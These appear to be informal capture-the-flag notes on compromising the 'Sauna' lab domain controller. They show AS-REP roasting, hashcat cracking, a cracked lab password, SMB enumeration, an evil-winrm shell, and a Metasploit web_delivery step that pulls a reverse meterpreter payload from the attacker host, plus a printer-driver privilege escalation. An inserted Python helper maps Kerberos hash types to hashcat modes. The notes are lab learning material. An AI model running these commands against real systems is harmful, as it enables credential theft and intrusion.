
Sauna

Nmap scan:

  • Kerberos
    • Kerberoast?
    • What I did wrong:
      • You can AS-REP roast (Kerberos with no password) against potential usernames taken from a user page to gain access
  • SMB secure
    • Can we find a user to access it?
  • Website (Microsoft IIS)
    • Can we gain access from here?
    • Default credentials?
    • Can we use evil-winrm (port 5985)?

Kerberoast with no pass (this is AS-REP roasting):

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/fsmith

hash:

Can we crack it?

hashcat -m 13100 egoHash.txt rockyou.txt -O

13100 (krb5tgs) didn’t work. krb5asrep is 18200!

find it by doing:

hashcat --help | grep Kerberos
hashcat -m 18200 egoHash.txt rockyou.txt -O
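The mode mix-up above comes from the hash prefix: GetNPUsers.py emits `$krb5asrep$23$...` (mode 18200) while GetUserSPNs.py emits `$krb5tgs$23$...` (mode 13100). As an added example, not from the original notes, the following Python picks the mode from the prefix and pulls out the targeted account so the same line can be used on the blue-team side to say which account was roasted. The sample hash lines are constructed (the hex blobs are placeholders, not real hashes); the file and wordlist names match the notes above.

```python
import re

# Hash prefixes emitted by the impacket scripts used in these notes, mapped to
# the hashcat mode that cracks them (the values `hashcat --help | grep Kerberos`
# prints). Only the RC4 AS-REP variant and the RC4/AES TGS variants are listed.
KERBEROS_MODES = {
    "$krb5asrep$23$": 18200,  # AS-REP roast output of GetNPUsers.py (RC4)
    "$krb5tgs$23$": 13100,    # Kerberoast output of GetUserSPNs.py (RC4)
    "$krb5tgs$17$": 19600,    # Kerberoast, AES128
    "$krb5tgs$18$": 19700,    # Kerberoast, AES256
}

# Constructed sample lines: the hex parts are placeholders, not real hashes.
SAMPLE_ASREP = "$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:aaaaaaaa$bbbbbbbb"
SAMPLE_TGS = ("$krb5tgs$23$*hsmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/hsmith*"
              "$cccccccc$dddddddd")


def hashcat_mode(hash_line):
    """Return the hashcat -m value for a Kerberos hash line, or None if the
    prefix is not one we recognise."""
    line = hash_line.strip()
    for prefix, mode in KERBEROS_MODES.items():
        if line.startswith(prefix):
            return mode
    return None


def principal(hash_line):
    """Return (account, realm) named in the hash: the roasted user for an
    AS-REP hash, the SPN account for an RC4 TGS hash; None if unparseable."""
    line = hash_line.strip()
    m = re.match(r"\$krb5asrep\$23\$([^@:]+)@([^:]+):", line)
    if m:
        return m.group(1), m.group(2)
    m = re.match(r"\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$", line)
    if m:
        return m.group(1), m.group(2)
    return None


def hashcat_command(hash_file, hash_line, wordlist="rockyou.txt"):
    """Build the hashcat command line for the hash type found in hash_line."""
    mode = hashcat_mode(hash_line)
    if mode is None:
        raise ValueError("unrecognised Kerberos hash format")
    return f"hashcat -m {mode} {hash_file} {wordlist} -O"


if __name__ == "__main__":
    for sample in (SAMPLE_ASREP, SAMPLE_TGS):
        print(hashcat_mode(sample), principal(sample))
        print(hashcat_command("egoHash.txt", sample))
```

Running it on the AS-REP sample yields the `-m 18200` line the notes arrive at by trial and error; on the TGS sample it yields `-m 13100`.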

cracked user:

fsmith:Thestrokes23

Pass the hash?:

cme smb 192.168.218.0/24 -u fsmith -H Thestrokes23 --local-auth

No, it has to be an NTLM hash (we need to crack the hash to

SAM Dump:

cme smb 10.10.10.175 -u fsmith -H Thestrokes23 --local-auth --sam

TGS?

EGOTISTICAL-BANK.local/fsmith

sudo GetUserSPNs.py EGOTISTICAL-BANK.local/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request

Didn’t work, but we found HSmith. Can we kerberoast it?

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/hsmith

no

Didn’t work. SMB with user?

enumerate smb shares:

cme smb -u 'fsmith' -p 'Thestrokes23' --shares 10.10.10.175

Access the read shares:

smbclient \\\\10.10.10.175\\NETLOGON -U fsmith%Thestrokes23
smbclient \\\\10.10.10.175\\print$ -U fsmith%Thestrokes23
smbclient "\\\\10.10.10.175\\RICOH Aficio SP" -U fsmith%Thestrokes23

That’s a printer share, not a folder! Is there an exploit for the driver?

on metasploit

Needs a session. Ports open for the server?

NEW:

What is WinRM? Port 5985

Reference: WinRM page in the Metasploit documentation.

Gaining access with Metasploit isn’t working. Get a normal shell first, then use web_delivery?

Update?

use scanner/winrm/winrm_login
run http://fsmith:Thestrokes23@10.10.10.175:5985

Um

set domain EGOTISTICAL-BANK.local
set username fsmith
set password Thestrokes23
set rhost 10.10.10.175
run http://fsmith:Thestrokes23@10.10.10.175:5985

still a no

evil winrm:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

We get a PowerShell session.

Use it to get a Metasploit session (web_delivery):

msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH
set srvport 6999
run -j
sessions -i 1

It hangs. x64?

set payload windows/x64/meterpreter/reverse_http

Worked!

Background the session and try the escalation (the RICOH printer driver privesc, using the user session we already have):

use windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
set session 1
run

Hanging. Try something faster and come back to this if it’s not working?

exploit suggester:

use post/multi/recon/local_exploit_suggester

Purple worked!